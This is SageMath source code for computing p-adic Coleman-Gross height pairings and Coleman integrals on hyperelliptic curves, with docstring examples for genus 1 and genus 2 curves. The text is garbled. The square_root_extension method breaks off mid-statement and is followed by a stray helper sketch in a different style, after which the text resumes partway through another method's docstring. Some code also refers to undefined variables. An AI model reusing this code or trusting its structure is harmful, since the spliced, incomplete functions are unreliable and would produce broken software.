having residue divisor \"Q - wQ\" in the notation of our paper\n elif P[0] == Q[0] and P[1] == -Q[1]:\n #changing P to R, P' to FR, Q to P 
(in our paper)\n f = self.hyperelliptic_polynomials()[0]\n diffpart1 = (f(P[0]) - f(x))*x.derivative()/(y*(x - P[0])*(P[1] + y))\n intpart = (diffpart1.integral())\n intpart = intpart.truncate(intpart.degree()+1)\n intpart1 = intpart(1)\n R_to_FR = intpart1 +log(FR[0]-P[0],0) - log(R[0] - P[0],0)\n elif self.is_same_disc(R,P):\n f = self.hyperelliptic_polynomials()[0]\n diffpart1 = (f(P[0]) - f(x))*x.derivative()/(2*y*(x-P[0])*(P[1] + y))\n intpart = (diffpart1.integral())\n intpart = intpart.truncate(intpart.degree()+1)\n intpart1 = intpart(1)\n diffpart2 = x.derivative()/(2*y)*(y + Q[1])/(x - Q[0])\n intpart2 = diffpart2.integral().truncate(2*prec)(1)\n R_to_FR = intpart1 +log(FR[0]-P[0],0) - log(R[0] - P[0],0) - intpart2\n elif self.is_same_disc(R,Q):\n f = self.hyperelliptic_polynomials()[0]\n diffpart1 = (f(Q[0]) - f(x))*x.derivative()/(2*y*(x-Q[0])*(Q[1] + y))\n intpart = (diffpart1.integral())\n intpart = intpart.truncate(intpart.degree()+1)\n intpart1 = intpart(1)\n diffpart2 = x.derivative()/(2*y)*(y + P[1])/(x - P[0])\n intpart2 = diffpart2.integral().truncate(2*prec)(1)\n R_to_FR = intpart2 - (intpart1 +log(FR[0]-Q[0],0) - log(R[0] - Q[0],0))\n else:\n R_to_FR = 0\n FS = self.frobenius(S)\n if S !=FS:\n if self.is_same_disc(S,P) == False and self.is_same_disc(S,Q) == False:\n x,y,z = self.local_analytic_interpolation(FS,S,2*prec)\n FS_to_S = (self.diff(divisor1,x,y,tiny=True)).integral()\n FS_to_S = FS_to_S.truncate(FS_to_S.degree()+1)\n FS_to_S = FS_to_S(1)\n elif P[0] == Q[0] and P[1] == -Q[1] and S[0] == R[0] and S[1] == -R[1]:\n FS_to_S = R_to_FR\n else:\n print(S, FS, P, Q)\n else:\n FS_to_S = 0\n res = self.res(divisor1,divisor2,prec)\n ab = self.res_alpha_int_beta(divisor1, divisor2, prec,cggen)\n cups = self.psiA_cup_psiB(divisor1,divisor2,prec)\n return 1/(1-p)*(cups+res+ab-FS_to_S-R_to_FR)\n\n def res(self,divisor1,divisor2,prec=30, cggen=False):\n \"\"\"\n Returns sum(res(alpha*integral(beta))), where alpha and beta are\n in the notation of Balakrishnan-Besser,\n ``Coleman-Gross height pairings and the p-adic sigma function,'' IMRN 2012\n (need to sum over all of the right residue discs)\n alpha[0] is at P\n alpha[1] is at Q\n alpha[2] is at zeta_p x(P)^(1/p)\n alpha[3] is at zeta_p x(Q)^(1/p)\n alpha[4] is at finite weierstrass_1\n ...\n alpha[2g+4] is at finite weierstrass_{2g+1}\n alpha[2g+5] is at infinity\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n from sage.schemes.hyperelliptic_curves.constructor import HyperellipticCurve\n K = self.base_ring()\n p = K.prime()\n A = self.alpha(divisor1,prec)\n div3 = self._pth_roots\n B = []\n r = self._fwstrass\n prec = self.base_ring().precision_cap()\n g = self.genus()\n for R in r:\n if R[0] !=0:\n x,y = self.local_coord(R,2*p*prec-p+2*g-1)\n B = B + [self.diff(divisor2,x,y)]\n dd= [f.degree() for f in B]\n Anew = []\n for i in range(len(A)):\n v = B[i].valuation()\n try:\n Anew = Anew + [A[i].truncate_neg(v-max(dd))]\n except AttributeError:\n Anew = [A[i]]\n ddd = [f.degree() for f in Anew]\n res = [Anew[i]*((B[i]).integral()) for i in range(len(Anew))]\n dddd = [f.degree() for f in res]\n res = [res[i].residue() for i in range(len(res))]\n S = K['x']\n f = S(self.hyperelliptic_polynomials()[0])\n degrees = [x[0].degree() for x in f.factor()]\n if len(r) == 2*g + 1:\n return sum(res)\n else: #here len(r) != 2*g+1 so we have to construct splitting fields\n if g > 6:\n raise NotImplementedError\n oldres = sum(res)\n f = self.hyperelliptic_polynomials()[0]\n if g == 1:\n if len(r) == 1:\n S = PowerSeriesRing(K, 
f.parent().variable_name(), default_prec=p+1)\n #S.set_default_prec(p+1)\n x = S.gen()\n oldprod = x - r[0][0]\n newg = (S(f)/S(oldprod)).truncate(p)\n J = K.extension(newg, names = 'b')\n elif len(r) == 0:\n J = K.extension(f,names= 'b')\n b = J.gen()\n EJ = self.change_ring(J)\n newr = self._newr = [EJ(b,0)]\n if g == 2:\n degrees = [x[0].degree() for x in f.factor()]\n if degrees == [5]:\n J = K.extension(f,names='b')\n b = J.gen()\n HJ = self.change_ring(J)\n newr = self._newr = [HJ(b,0)]\n elif (degrees == [1,4] or degrees == [1,1,3] or degrees == [1,1,1,3] or degrees == [1,1,1,2]):\n S = K[[f.parent().variable_name()]]\n x = S.gen()\n oldprod=1\n for i in range(len(r)):\n oldprod = oldprod*(x-r[i][0])\n J = K.extension((S(f)/S(oldprod)).polynomial(), names = 'b')\n b = J.gen()\n HJ = self.change_ring(J)\n newr = self._newr = [HJ(b,0)]\n elif degrees == [1,2,2]:\n pols = f.factor()\n J = K.extension(pols[1][0],names='b')\n b = J.gen()\n L = K.extension(pols[2][0],names='c')\n c = L.gen()\n newr = self._newr = [(b,0),(c,0)]\n elif degrees == [2,3]:\n pols = f.factor()\n J = K.extension(pols[0][0],names='b')\n b = J.gen()\n L = K.extension(pols[1][0],names='c')\n c = L.gen()\n newr = self._newr = [(b,0),(c,0)]\n if g == 3:\n rcount = len(r)\n pols = f.factor()\n if degrees == [7]:\n J = K.extension(f,names='b')\n b = J.gen()\n HJ = self.change_ring(J)\n newr = self._newr = [HJ(b,0)]\n elif (degrees == [1,6] or degrees == [1,1,5] or degrees == [1,1,1,4] or \\\n degrees == [1,1,1,1,3] or degrees == [1,1,1,1,1,2]):\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n HJ = self.change_ring(J)\n newr = self._newr = [HJ(b,0)]\n elif (degrees == [2,5] or degrees == [3,4] or degrees == [1,2,4] or \\\n degrees == [1,3,3] or degrees == [1,1,2,3] or degrees == [1,1,1,2,2]):\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n L = K.extension(pols[rcount+1][0],names='c')\n c = L.gen()\n newr = self._newr = [(b,0),(c,0)]\n elif (degrees == [2,2,3] or degrees == [1,2,2,2]):\n pols = f.factor()\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n L = K.extension(pols[rcount+1][0],names='c')\n c = L.gen()\n M = K.extension(pols[rcount+2][0],names='d')\n d = M.gen()\n newr = self._newr = [(b,0),(c,0),(d,0)]\n if g == 4:\n rcount = len(r)\n pols = f.factor()\n if degrees == [9]:\n J = K.extension(f,names='b')\n b = J.gen()\n HJ = self.change_ring(J)\n newr = self._newr = [HJ(b,0)]\n elif degrees in [[1,8], [1,1,7], [1,1,1,6], [1,1,1,1,5], [1,1,1,1,1,4],\\\n [1,1,1,1,1,1,3], [1,1,1,1,1,1,1,2]]:\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n HJ = self.change_ring(J)\n newr = self._newr = [HJ(b,0)]\n elif degrees in [[1,3,5], [3,6], [1,2,6], [1,1,2,5], [4,5], [2,7],\\\n [1,4,4], [1,1,3,4], [1,1,1,2,4], [1,1,1,1,2,3], [1,1,1,3,3],\\\n [1,1,1,1,1,2,2]]:\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n L = K.extension(pols[rcount+1][0],names='c')\n c = L.gen()\n newr = self._newr = [(b,0),(c,0)]\n elif degrees in [[2,3,4],[2,2,5],[3,3,3],[1,2,2,4],[1,2,3,3],[1,1,2,2,3],[1,1,1,2,2,2]]:\n pols = f.factor()\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n L = K.extension(pols[rcount+1][0],names='c')\n c = L.gen()\n M = K.extension(pols[rcount+2][0],names='d')\n d = M.gen()\n newr = self._newr = [(b,0),(c,0),(d,0)]\n elif degrees in [[1,2,2,2,2],[2,2,2,3]]:\n pols = f.factor()\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n L = K.extension(pols[rcount+1][0],names='c')\n c = L.gen()\n M = K.extension(pols[rcount+2][0],names='d')\n d = 
M.gen()\n N = K.extension(pols[rcount+3][0],names='e')\n e = N.gen()\n newr = self._newr = [(b,0),(c,0),(d,0),(e,0)]\n if g == 5:\n raise NotImplementedError\n if g == 6:\n rcount = len(r)\n pols = f.factor()\n if degrees == 8*[1] + [2,3]:\n J = K.extension(pols[rcount][0],names='b')\n b = J.gen()\n L = K.extension(pols[rcount+1][0],names='c')\n c = L.gen()\n newr = self._newr = [(b,0),(c,0)]\n else:\n raise NotImplementedError\n newres = []\n for R in newr:\n x,y = self.local_coord(R, 2*p*prec - p - 3 + 2*g - 1 + 5)\n newfrob = self.frob_diff_wstrass(divisor1, x, y, prec)\n newdiff = self.diff(divisor1, x, y)\n newbeta = self.diff(divisor2, x, y)\n newalpha = newfrob - p*newdiff\n #fixed indent below 8/27/19\n try:\n newres = newres + [(newalpha*newbeta.integral()).residue().trace()]\n except AttributeError:\n newres = newres + [(newalpha*newbeta.integral()).residue()]\n newres = sum(newres)\n return oldres + newres\n\n def alpha(self, divisor, prec=20,all=False):\n \"\"\"\n Returns alpha = phi^*w - p*w in the various local coordinates, where\n w has residue divisor (P)-(Q) and\n if all = True: P, Q, pth roots, then weierstrass\n else: just finite weierstrass\n #alpha[0] is at P\n #alpha[1] is at Q\n #alpha[2] is at zeta_p x(P)^(1/p)\n #alpha[3] is at zeta_p x(Q)^(1/p)\n have to re-index the following:\n alpha[4] is at finite weierstrass_1\n ...\n alpha[2g+4] is at finite weierstrass_{2g+1}\n alpha[2g+5] is at infnity\n So we have the following consistency checks (since res in each disc is supposed to be 0):\n (this also works when supp(divisor) is just in 1 disc)\n alpha[0].residue() + alpha[2].residue().trace() = 0\n alpha[1].residue() + alpha[3].residue().trace() = 0\n alpha[4].residue() = ... = alpha[2g+5].residue() = 0\n sage: R. = QQ['x']\n sage: K = Qp(7,6)\n sage: H = HyperellipticCurve(x*(x-1)*(x+9))\n sage: HK = H.change_ring(K)\n sage: P = HK(-1,4)\n sage: Q = HK(9,-36)\n sage: a = HK.alpha([(1,P),(-1,Q)])\n sage: (a[2]).residue().trace()+(a[0]).residue()\n O(7^5)\n sage: (a[3]).residue().trace()+(a[1]).residue()\n O(7^4)\n sage: [(a[i]).residue() for i in range(4,8)]\n [0, 0, 0, 0]\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n g = self.genus()\n p = self.base_ring().prime()\n if all:\n D1 = [divisor[0][1],divisor[1][1]]\n D2 = self._pth_roots\n frob = []\n diff = []\n if all:\n for i in range(2):\n x,y = self.local_coord(D1[i],2*prec)\n frob = frob+ [self.frob_diff_nw(divisor,x,y,prec)]\n diff = diff + [self.diff(divisor,x,y)]\n for i in range(2):\n x,y = self.local_coord(D2[i],2*prec)\n frob = frob + [self.frob_diff_nw(divisor,x,y,prec)]\n diff = diff + [self.diff(divisor,x,y)]\n r = self._fwstrass\n for R in r:\n if R[0] != 0:\n x,y = self.local_coord(R,2*p*prec-p+2*g-1) #this seems to be the min for prec=5\n frob = frob + [self.frob_diff_wstrass(divisor,x,y,prec)]\n diff = diff + [self.diff(divisor,x,y)]\n alpha = [frob[i]-p*diff[i] for i in range(len(frob))]\n return alpha\n\n def find_pth_root_point(self,P,all=False):\n \"\"\"\n Given P=(a,b), finds a point P'=(a',b') over Qp(a^(1/p) such that\n a'^p = a\n if all=True, find all pth roots\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n K = self.base_ring()\n p = K.prime()\n xP = P[0]\n\n g = self.hyperelliptic_polynomials()[0]\n ###working over the appropriate field\n R = QQ['x']\n x = R.gen()\n #replace self._sanity by P._sanity\n P._sanity = sanity = None\n if xP**p==xP:\n f = cyclotomic_polynomial(p,var='y')\n J = K.extension(f(x+1),names='a')\n else:\n try:\n\n J = K.extension((x+QQ(xP))**p-QQ(xP),names='a')\n except 
(NameError, ValueError, NotImplementedError):\n try:\n J = K.extension((x+xP)**p - (xP), names='a')\n except (NameError, NotImplementedError):\n try:\n rootshere = (x**p - xP).roots()\n except :\n gg = x**p - xP\n rootsmodp = GF(p)['x'](gg).roots()\n xi = ZZ(rootsmodp[0][0])\n for j in range(1,K.precision_cap()):\n for i in range(p):\n if gg(xi + i*p**j).valuation() == j+2:\n xi = xi + i*p**j\n break\n r = xi\n rootshere = [(r,1)]\n if len(rootshere) > 0:\n #S = K[['x']]\n #S.set_default_prec(p+1)\n S = PowerSeriesRing(K, 'x', default_prec=p+1)\n x = S.gen()\n newg = (S(x**p-xP)/(S(x-rootshere[0][0]))).truncate(p)\n for i in range(p):\n try:\n J = K.extension(newg(x+i), names='a')\n sanity = i\n #replace self._sanity and self._extrart by P._sanity and P._extrart\n P._sanity = sanity\n P._extrart = rootshere[0][0]\n except (NameError,ValueError,NotImplementedError):\n pass\n else:\n print(\"Sorry! Extension failed!\")\n a = J.gen()\n HJ = self.change_ring(J)\n\n #find the pth roots of x(P)\n if xP**p == xP:\n xPfracpow = (1+a)*xP\n elif sanity == None:\n xPfracpow = a+xP\n else:\n xPfracpow = a + sanity\n if g(xPfracpow)==0:\n return HJ(xPfracpow,0)\n yPfracpow = HJ.square_root_extension(g(xPfracpow))\n Pfracpow = HJ(xPfracpow,yPfracpow)\n P = HJ(P[0],P[1])\n if P[0]==Pfracpow[0] :\n xnew = (a+xP)*Pfracpow[0]\n ynew = HJ.square_root_extension(g(xnew))\n Pfracpow = HJ(xnew,ynew)\n if ((Pfracpow[1]).expansion()[0] == (P[1]).expansion()[0]):\n point = Pfracpow\n else:\n point = HJ(Pfracpow[0],-Pfracpow[1])\n if all == False:\n return point\n else:\n if xP**p != xP:\n print(\"Sorry, we can only print all of the roots when the extension is cyclotomic.\")\n return point\n else:\n pts = [point]\n xs = [(a+1)**i*(pts[0][0]) for i in range(1,p-1)]\n ys = [HJ.square_root_extension(g(x)) for x in xs]\n ynew = []\n for y in ys:\n if y.expansion()[0] != (P[1]).expansion()[0] :\n ynew = ynew + [-y]\n else:\n ynew = ynew + [y]\n pts = pts + [HJ(xs[i],ynew[i]) for i in range(len(xs))]\n return pts\n\n def square_root_extension(self,num):\n \"\"\"\n Takes a square root in a p-adic extension\n \"\"\"\n p = self.base_ring().prime()\n if num.valuation() == 0:\n c = num.expansion()[0]\n i = 1\n while i

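# A hedged, self-contained sketch of the Hensel/Newton square-root technique that\n    # newton_sqrt and square_root_extension implement; the helper name is hypothetical,\n    # and it assumes p odd and a a unit square in K = Qp(p, prec).\n    def _padic_unit_sqrt_sketch(a, K):\n        p = K.prime()\n        r = K(ZZ(GF(p)(a.expansion(0)).sqrt()))  # seed: a square root of a mod p\n        for _ in range((log(RR(K.precision_cap()), 2)).ceil() + 1):\n            r = (r + a/r)/2  # each Newton step doubles the p-adic accuracy\n        return r\n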
    _A)_{i=0...2g-1}, where w is a differential form with residue divisor \"divisor\"\n if extension== True, creates the appropriate field extension and curve over that extension\n P is fixed point for all computations to link constants of integration\n Q is the residue disc where all the stuff should be happening\n TODO: merge with sum_of_local_symbols, make more modular\n \"\"\"\n p = self.base_ring().prime()\n if Q[1] == 0:\n wstrass = True\n else:\n wstrass = False\n if extension==True:\n A = self.find_pth_root_point(Q)\n else:\n A = Q\n g = self.hyperelliptic_polynomials()[0]\n gen = self.genus()\n\n ###working over the appropriate field\n cyc = False\n if extension==True:\n R = QQ['x']\n x = R.gen()\n if cyc==True:\n f = cyclotomic_polynomial(p)\n J = self.base_ring().extension(f(x+1),names='a')\n else:\n if Q[0]**p==Q[0]:\n f =((x+Q[0])**p-Q[0])\n d = f.degree()\n ff = sum(f.list()[i]*x**(i-1) for i in range(1,d+1))\n J = self.base_ring().extension(ff,names='a')\n else:\n J = self.base_ring().extension((x+Q[0])**p-Q[0],names='a')\n a = J.gen()\n H = self.change_ring(J)\n else:\n H = self\n\n x,y = H.local_coord(A,prec) #worry about prec later\n ###formal antiderivative of w_i\n try:\n I2 = vector(J,[0]*2*gen)\n except UnboundLocalError:\n R = QQ['x']\n x = R.gen()\n if cyc == True:\n f = cyclotomic_polynomial(p)\n J = self.base_ring().extension(f(x+1),names='a')\n else:\n if Q[0]**p==Q[0]:\n f =((x+Q[0])**p-Q[0])\n d = f.degree()\n ff = sum(f.list()[i]*x**(i-1) for i in range(1,d+1))\n J = self.base_ring().extension(ff,names='a')\n else:\n J = self.base_ring().extension((x+Q[0])**p-Q[0],names='a')\n I2 = vector(J,[0]*2*gen)\n extension = True\n ###if working over an extension, need tiny integral + coleman integral over Qp\n if extension == True:\n xx,yy = H.local_analytic_interpolation_cyclotomic(Q,A[0],prec) #this will change when it's weiestrass\n Q_to_A = [(xx.derivative()*xx**i/(2*yy)).integral() for i in range(2*gen)] #changed 1210 ##changed 03/04\n I = vector([f(1)-f(0) for f in Q_to_A]) #changed 1210\n\n P = H(P[0],P[1])\n ###plus a Coleman integral to offset the constant if P,A aren't in the same residue disc #this will change when it's weierstrass\n xm,ym = self.monsky_washnitzer_gens()\n omega = self.invariant_differential()\n\n if ((P[0]).expansion()[0] != (A[0]).expansion()[0] or (P[1]).expansion()[0] != (A[1]).expansion()[0]):\n I2= vector([self.coleman_integral(omega*xm**i,divisor[0][1],divisor[1][1]) for i in range(2*gen)])\n else:\n I = vector([self.coleman_integral(omega*xm**i,divisor[0][1],A) for i in range(2*gen)]) #weierstrass case\n w = self.frob_diff_nw(divisor,x,y,prec)\n v = [(w*(I[n]+I2[n])) for n in range(2*gen)]\n v = [f.residue_at_zero() for f in v]\n try:\n return vector([f.trace() for f in v])\n except AttributeError:\n return vector(self.base_ring(),v)\n\n\n def height(self,divisor1,divisor2,prec=None, cggen=False):\n \"\"\"\n The p-part of the Coleman-Gross height pairing of divisor1 and\n divisor2\n If self has ordinary reduction at self.base_ring().prime(), the height pairing\n is symmetric.\n GENUS 1 EXAMPLES\n sage: R. 
= QQ[]\n sage: H = HyperellipticCurve(x*(x-1)*(x+9))\n sage: K = Qp(7,10)\n sage: HK = H.change_ring(K)\n sage: P = HK(9,36)\n sage: Q = HK.teichmuller(P)\n sage: Pprime = HK(-4,10)\n sage: Qprime = HK.teichmuller(Pprime)\n sage: HK.height([(1,P),(-1,Q)],[(1,Pprime),(-1,Qprime)],10)\n 2*7^2 + 5*7^3 + 7^4 + 7^5 + 2*7^6 + 3*7^7 + 7^8 + 3*7^9 + O(7^10)\n sage: HK.height([(1,Pprime),(-1,Qprime)],[(1,P),(-1,Q)],10)\n 2*7^2 + 5*7^3 + 7^4 + 7^5 + 2*7^6 + 3*7^7 + 7^8 + 3*7^9 + O(7^10)\n sage: R. = QQ[]\n sage: H = HyperellipticCurve(x*(x-1)*(x+9))\n sage: K = Qp(7,10)\n sage: HK = H.change_ring(K)\n sage: P = HK(-1,4)\n sage: Q = HK(-1,-4)\n sage: R = HK(-4,-10)\n sage: S = HK(-4,10)\n sage: Pprime = HK(25/16,195/64)\n sage: Qprime = HK(25/16,-195/64)\n Test that h_7(P-Q, R-S) + h_7(P-Q, S-Pprime) = h_7(P-Q,R-Pprime)\n sage: HK.height([(1,P),(-1,Q)],[(1,R),(-1,S)],9)\n 6*7 + 5*7^2 + 2*7^3 + 4*7^4 + 7^5 + 3*7^6 + 7^7 + 4*7^9 + O(7^10)\n sage: HK.height([(1,P),(-1,Q)],[(1,S),(-1,Pprime)],9)\n 4*7 + 2*7^2 + 3*7^3 + 6*7^4 + 5*7^5 + 4*7^6 + 6*7^7 + 2*7^8 + 5*7^9 + O(7^10)\n sage: HK.height([(1,P),(-1,Q)],[(1,R),(-1,Pprime)],9)\n 3*7 + 7^2 + 6*7^3 + 3*7^4 + 7^6 + 7^7 + 3*7^8 + 2*7^9 + O(7^10)\n sage: 6*7 + 5*7^2 + 2*7^3 + 4*7^4 + 7^5 + 3*7^6 + O(7^7)+4*7 + 2*7^2 + 3*7^3 + 6*7^4 + 5*7^5 + 4*7^6 + 6*7^7 + 2*7^8 + 5*7^9 + O(7^10)\n 3*7 + 7^2 + 6*7^3 + 3*7^4 + 7^6 + 7^7 + 3*7^8 + 2*7^9 + O(7^10)\n Test that h_7(Pprime-P, R-S) = h_7(Q-Qprime, R-S), where (Pprime)-(P) ~ (Q)-(Qprime)\n sage: HK.height([(1,Pprime),(-1,P)],[(1,R),(-1,S)],9)\n 3*7 + 7^3 + 7^4 + 7^5 + 2*7^6 + 2*7^7 + 7^8 + O(7^10)\n sage: HK.height([(1,Q),(-1,Qprime)],[(1,R),(-1,S)],9)\n 3*7 + 7^3 + 7^4 + 7^5 + 2*7^6 + 2*7^7 + 7^8 + O(7^10)\n GENUS 2 EXAMPLES\n (with respect to W the unit root subspace)\n sage: R. = PolynomialRing(pAdicField(11,10))\n sage: H = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: P = H(-4,24)\n sage: Pprime = H.teichmuller(P)\n sage: Q = H(5,30)\n sage: Qprime = H.teichmuller(Q)\n sage: H.height([(1,Q),(-1,Qprime)],[(1,P),(-1,Pprime)],10)\n 6*11^2 + 9*11^3 + 4*11^4 + 2*11^5 + 6*11^6 + 4*11^7 + 6*11^8 + 11^9 + O(11^10)\n sage: H.height([(1,P),(-1,Pprime)],[(1,Q),(-1,Qprime)],10)\n 6*11^2 + 9*11^3 + 4*11^4 + 2*11^5 + 6*11^6 + 4*11^7 + 6*11^8 + 11^9 + O(11^10)\n sage: R. = PolynomialRing(pAdicField(11,10))\n sage: H = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: P = H(-4,24)\n sage: Pprime = H(-4,-24)\n sage: Q = H(5,30)\n sage: Qprime = H(5,-30)\n sage: H.height([(1,P),(-1,Pprime)],[(1,Q),(-1,Qprime)],10)\n 6*11^-1 + 10 + 7*11 + 6*11^2 + 3*11^3 + 7*11^4 + 7*11^5 + 11^6 + O(11^8)\n sage: H.height([(1,Q),(-1,Qprime)],[(1,P),(-1,Pprime)],10)\n 6*11^-1 + 10 + 7*11 + 6*11^2 + 3*11^3 + 7*11^4 + 7*11^5 + 11^6 + O(11^8)\n sage: R. 
= Qp(11,10)['x']\n sage: H = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: P = H(-4,24)\n sage: Q = H(5,30)\n sage: R = H(1,6)\n sage: S = H(-2,12)\n sage: H.height([(1,P),(-1,Q)],[(1,R),(-1,S)],10)\n 7*11^-1 + 3 + 8*11 + 6*11^2 + 5*11^3 + 7*11^4 + 3*11^5 + 9*11^6 + 6*11^7 + O(11^8)\n sage: H.height([(1,R),(-1,S)],[(1,P),(-1,Q)],10)\n 7*11^-1 + 3 + 8*11 + 6*11^2 + 5*11^3 + 7*11^4 + 3*11^5 + 9*11^6 + 6*11^7 + O(11^8)\n \"\"\"\n if prec == None:\n prec = self.base_ring().precision_cap()\n P = divisor1[0][1]\n Q = divisor1[1][1]\n R = divisor2[0][1]\n S = divisor2[1][1]\n if P == R and Q == S == self(0,1,0):\n negP = self(P[0],-P[1])\n div1 = [(1,P),(-1,negP)]\n int_eta = self.init_height(div1,div1,prec)\n int_eta = self.eta_integral(div1,div1)\n Q = self.find_Q(P)\n negQ = self(Q[0],-Q[1])\n int_omega_at_P = self.special_int_omega(P)\n int_omega_P_to_Q = int_omega_at_P(Q[0]-P[0]) + log(Q[0]-P[0],0)\n self.init_height([(1,P),(-1,negP)],[(1,Q),(-1,negQ)])\n int_omega_wQ_to_Q = self.omega_integral([(1,P),(-1,negP)],[(1,Q),(-1,negQ)])\n height_minus = -2*int_omega_P_to_Q + int_omega_wQ_to_Q - int_eta\n b = P[1]\n return 1/QQ(4)*log(4*b**2) + 1/QQ(4)*height_minus\n\n else:\n self.init_height(divisor1,divisor2,prec)\n if (self.is_weierstrass(R) and self.is_weierstrass(S)):\n eta = 0\n else:\n eta = self.eta_integral(divisor1,divisor2)\n omega = self.omega_integral(divisor1,divisor2,prec,cggen)\n return omega - eta\n\n def neg_point(self,P):\n return self(P[0],-P[1])\n\n def is_ordinary(self):\n \"\"\"\n determines if self.base_ring().prime() is a prime of ordinary reduction\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n g = self.genus()\n f = M_frob.charpoly()\n if f.list()[g].valuation() == 0:\n return True\n else:\n return False\n\n\n def local_analytic_interpolation_cyclotomic(self,P,Q,prec=100):\n \"\"\"\n Given P and x(Q), with P,Q\n in the same residue disc and P defined over Qp,\n this computes the local analytic interpolation\n between P,Q\n USE: for non-weierstrass points\n \"\"\"\n #print \"local_analytic_interpolation_cyclotomic\", prec\n #R = Q.parent()[['t']]\n #t = R.gen()\n #R.set_default_prec(prec)\n R = PowerSeriesRing(Q.parent(), 't', default_prec = prec)\n t = R.gen()\n x,y = self.local_coord(P,prec) #figure out precision here\n X = (x(R((Q-P[0])*t)))\n Y = (y(R((Q-P[0])*t)))\n return X,Y\n\n def tiny_integrals_on_basis_to_z(self,b):\n \"\"\"\n Returns all tiny integrals on basis to a parameter z\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n prec = self.base_ring().precision_cap()\n x,y = self.local_coord(b,prec)\n #S = self.base_ring()[['z']]\n #z = S.gen()\n #S.set_default_prec(prec+10)\n S = PowerSeriesRing(S, 'z', default_prec=prec+10)\n z = S.gen()\n d = self.hyperelliptic_polynomials()[0].degree()\n return [((x**i)*x.derivative()/(2*y)).integral()(z) for i in range(d-1)]\n\n def tiny_double_integrals_on_basis_to_z(self,b):\n \"\"\"\n Returns all tiny double integrals on basis unless b is infinity:\n then just returns \\int w0 w0, \\int w0 \\int w_{2g-1}... 
\\int w_{g-1} w_{2g-1}\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n prec = self.base_ring().precision_cap()\n x,y = self.local_coord(b,prec)\n #S = self.base_ring()[['z']]\n d = self.hyperelliptic_polynomials()[0].degree()\n #z = S.gen()\n #S.set_default_prec(prec+10)\n S = PowerSeriesRing(S, 'z', prec+10)\n z = S.gen()\n\n inner = self.tiny_integrals_on_basis_to_z(b)\n doubles = []\n for i in range(d-1):\n doubles = doubles + [( ((x**i*x.derivative()/(2*y))(z))*J).integral() for J in inner]\n return doubles\n\n def coleman_integrals_on_basis_to_z(self, P, Q):\n \"\"\"\n INPUT:\n - P: a non-Weierstrass point\n - Q: a point whose residue disc is where computations are taking place\n **i.e., we're doing things wrt z + Q[0]\n OUTPUT:\n Returns the vector (\\int_P^Q x^i dx/(2y))\n\t EXAMPLES:\n\t sage: R. = QQ['x']\n\t sage: E = EllipticCurve('37a1')\n\t sage: H = E.short_weierstrass_model()\n\t sage: K = Qp(5,10)\n\t sage: HK = H.change_ring(K)\n\t sage: P = HK(0,4)\n\t sage: Q = HK(4,4)\n\t sage: f = HK.coleman_integrals_on_basis_to_z(P,Q)\n\t sage: f(0)\n\t (4*5 + 4*5^2 + 4*5^3 + 3*5^5 + 2*5^6 + 2*5^7 + 2*5^8 + 5^9 + O(5^10), 2 + 2*5 + 3*5^2 + 3*5^3 + 3*5^4 + 3*5^5 + 2*5^6 + 3*5^7 + 4*5^8 + 3*5^9 + O(5^10))\n\t sage: HK.coleman_integrals_on_basis(P,Q)\n\t (4*5 + 4*5^2 + 4*5^3 + 3*5^5 + 2*5^6 + 2*5^7 + 2*5^8 + 5^9 + O(5^10), 2 + 2*5 + 3*5^2 + 3*5^3 + 3*5^4 + 3*5^5 + 2*5^6 + 3*5^7 + 4*5^8 + 3*5^9 + O(5^10))\n\t sage: HK.lift_x(4+5,all=True)[1]\n\t (4 + 5 + O(5^10) : 4 + 4*5 + 2*5^2 + 2*5^3 + 5^4 + 4*5^5 + 3*5^6 + 2*5^7 + O(5^10) : 1 + O(5^10))\n\t sage: R = HK.lift_x(4+5,all=True)[1]\n\t sage: f(5)\n\t (5 + 3*5^2 + 5^3 + 3*5^4 + 5^5 + 5^6 + 2*5^7 + 2*5^8 + 5^9 + O(5^10), 2 + 3*5^2 + 3*5^3 + 2*5^5 + 4*5^6 + 5^7 + 4*5^8 + 2*5^9 + O(5^10))\n\t sage: HK.coleman_integrals_on_basis(P,R)\n\t (5 + 3*5^2 + 5^3 + 3*5^4 + 5^5 + 5^6 + 2*5^7 + 2*5^8 + 5^9 + O(5^10), 2 + 3*5^2 + 3*5^3 + 2*5^5 + 4*5^6 + 5^7 + 4*5^8 + 2*5^9 + O(5^10))\n AUTHOR:\n - Jennifer Balakrishnan (2010-05)\n - Jennifer Balakrishnan (2015-04): added functionality for even degree models\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n K = self.base_ring()\n #S = PowerSeriesRing(K,names='z')\n prec = K.precision_cap()\n p = K.prime()\n prec = prec +10\n #S.set_default_prec(prec)\n #z = S.gen()\n S = PowerSeriesRing(K,'z',default_prec=prec)\n z = S.gen()\n d = self.hyperelliptic_polynomials()[0].degree()\n dim = d - 1\n disc = self.residue_disc(Q)\n Qold = Q\n Q = self.lift_x(z + Q[0])\n if (Q[1] - Qold[1]).valuation() < 1:\n Q = (Q[0], -Q[1])\n #if self.residue_disc(Q) != disc:\n # Q = (Q[0],-Q[1])\n x,y = self.local_coord_with_z(Q,prec)\n integrals = [(x**i*x.derivative()/(2*y)).integral() for i in range(dim)]\n if self.is_same_disc(P,Qold):\n return vector([-I(P[0]-Q[0]) for I in integrals])\n else:\n return self.coleman_integrals_on_basis(P,Qold) + vector([-I(-z) for I in integrals])\n\n def local_coord_with_z(self, P, prec = 20, name='t'):\n 